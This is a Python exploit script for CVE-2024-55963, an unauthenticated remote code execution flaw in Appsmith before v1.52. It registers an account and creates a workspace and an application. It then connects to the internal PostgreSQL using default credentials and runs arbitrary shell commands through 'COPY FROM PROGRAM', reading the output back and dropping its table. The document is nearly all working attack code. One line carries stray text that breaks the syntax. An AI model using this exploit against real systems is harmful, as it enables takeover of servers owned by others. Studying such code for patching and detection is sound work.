# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE) # Original Author: Rhino Security Labs # Exploit Author: Nishanth Anand # Exploit Date: April 2, 2025 # Vendor Homepage: https://www.appsmith.com/ # Software Link: https://github.com/appsmithorg/appsmith # Version: Prior to v1.52 # Tested Versions: v1.47 # CVE ID: CVE-2024-55963 # Vulnerability Type: Remote Code Execution # Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution. # Proof of Concept: Yes # Categories: Web Application, Remote Code Execution, Database # CVSS Score: 9.8 (Critical) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system. import requests import json import pyfiglet import argparse # Create a banner using pyfiglet banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title print(banner) # Set up argument parser parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept') parser.add_argument('-u', '--url', required=True, help='Base URL of the target') parser.add_argument('command', nargs='?', default='id', help='Command to execute') args = parser.parse_args() # Get the base URL and command from the parsed arguments base_url = args.url command_arg = args.command if not base_url.startswith("http://") and not base_url.startswith("https://"): base_url = "http://" + base_url # Signup request signup_url = f"{base_url}/api/v1/users" signup_data = { "email": "poc1@poc.com", "password": "Testing123!" 
} print('Signing up...') signup_response = requests.post(signup_url, data=signup_data) signup_response.raise_for_status() # Login request login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed login_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/user/login", "Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed", } login_data = { "username": "poc1@poc.com", # Adjusted to match the provided request "password": "Testing123!" 
} # Make the login request without following redirects print('Logging in...') login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False) login_response.raise_for_status() # Capture the 'Set-Cookie' header if it exists set_cookie = login_response.headers.get('Set-Cookie') if set_cookie: # Split the Set-Cookie header to get the cookie name and value cookie_name, cookie_value = set_cookie.split(';')[0].split('=') # Fourth request to create a new workspace print('Creating a new workspace...') if set_cookie: fourth_request_url = f"{base_url}/api/v1/workspaces" fourth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Connection": "keep-alive", "Referer": f"{base_url}/applications", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data) fourth_response.raise_for_status() # Extract the 'id' from the response if it exists try: response_json = fourth_response.json() workspace_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging if workspace_id: fifth_request_url = f"{base_url}/api/v1/applications" fifth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "Content-Length": "161", "Origin": base_url, "Connection": 
"keep-alive", "Referer": f"{base_url}/applications?workspaceId={workspace_id}", "Cookie": f"{cookie_name}={cookie_value}", } fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None}) print('Creating a new application...') fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data) fifth_response.raise_for_status() try: response_json = fifth_response.json() application_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fifth_response.text) # Sixth request to get workspace details if workspace_id: sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" sixth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting workspace details...') sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers) sixth_response.raise_for_status() # Extract all plugin IDs from the response try: response_json = sixth_response.json() plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])] # Loop through each plugin ID for the seventh request print(f'Searching for vulnerable postgres database...') for plugin_id in plugin_ids: # Seventh request to get the form data for the plugin seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" seventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", 
"Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasources/NEW", "Cookie": f"{cookie_name}={cookie_value}", } try: seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) seventh_response.raise_for_status() # Extracting the port value from the seventh response try: seventh_response_json = seventh_response.json() if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: form_data = seventh_response_json['data']['form'] if any("postgres" in str(item) for item in form_data): print(f"Vulnerable postgres database found.") break else: pass except (ValueError, IndexError) as e: pass except requests.exceptions.HTTPError as e: print(f"Error checking plugin {plugin_id}: {e}") continue # Proceed to request 8 after finding "postgres" # Proceed to request 8 after finding "postgres" if "postgres" in str(seventh_response_json): try: # Try the environments API endpoint eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" eighth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", "Cookie": f"{cookie_name}={cookie_value}", } print('Getting the workspace details...') eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) eighth_response.raise_for_status() # Extracting the workspace ID from the eighth response try: eighth_response_json = 
eighth_response.json() workspace_data = eighth_response_json.get("data", [{}])[0] workspace_id_value = workspace_data.get("id") except (ValueError, IndexError): print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) except requests.exceptions.HTTPError as e: # If the environments API fails, use the workspace ID we already have print(f"Could not fetch environment details: {e}") print("Using existing workspace ID for datasource creation...") workspace_id_value = workspace_id except (ValueError, IndexError): print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # After the eighth request to get workspace details if workspace_id_value: ninth_request_url = f"{base_url}/api/v1/datasources" ninth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195", "Cookie": f"{cookie_name}={cookie_value}", } ninth_request_data = { "pluginId": plugin_id, "datasourceStorages": { workspace_id_value: { "datasourceConfiguration": { "properties": [None, {"key": "Connection method", "value": "STANDARD"}], "connection": { "mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"} }, "endpoints": [{"port": "5432", "host": "localhost"}], "sshProxy": {"endpoints": [{"port": "22"}]}, "authentication": { "databaseName": "postgres", "username": "postgres", "password": "postgres" } }, "datasourceId": "", "environmentId": workspace_id_value, "isConfigured": True } }, "name": "Untitled 
datasource 1", "workspaceId": workspace_id } print('Connecting to vulnerable postgres database...') ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data) ninth_response.raise_for_status() # Extracting the ID from the response try: ninth_response_json = ninth_response.json() datasource_id = ninth_response_json.get("data", {}).get("id") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # After the ninth request to create the datasource if datasource_id: # 10th Request tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" tenth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } tenth_request_data = { "title": "SELECT", "body": "create table poc (column1 TEXT);", "suggested": True } print("Creating the table 'poc'...") tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data) tenth_response.raise_for_status() # 11th Request eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" eleventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", 
"x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", } eleventh_request_data = { "title": "SELECT", "body": f"copy poc from program '{command_arg}';", "suggested": True }/CVE-2024-55963-Appsmith-RCE print("Running command...") eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) eleventh_response.raise_for_status() # 12th Request twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id twelfth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for the 12th schema preview twelfth_request_data = { "title": "SELECT", "body": "select * from poc;", "suggested": True } # Print statement before the 12th request print("Reading command output from poc table...\n") # Make the POST request for the 12th schema preview twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) # Extracting and printing the response from the 12th schema preview try: twelfth_response_json = twelfth_response.json() # Extracting the specific data body_data = twelfth_response_json.get("data", 
{}).get("body", []) column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values print("Command output:") print("----------------------------------------") for value in column1_values: print(value) # Print each column1 value print("----------------------------------------\n") except (ValueError, KeyError): print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging # Cleanup Request cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id cleanup_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } # Request body for cleanup cleanup_request_data = { "title": "SELECT", "body": "DROP TABLE poc;", # Command to drop the table "suggested": True } # Make the POST request for the cleanup print('\nDropping the table...') cleanup_response = requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data)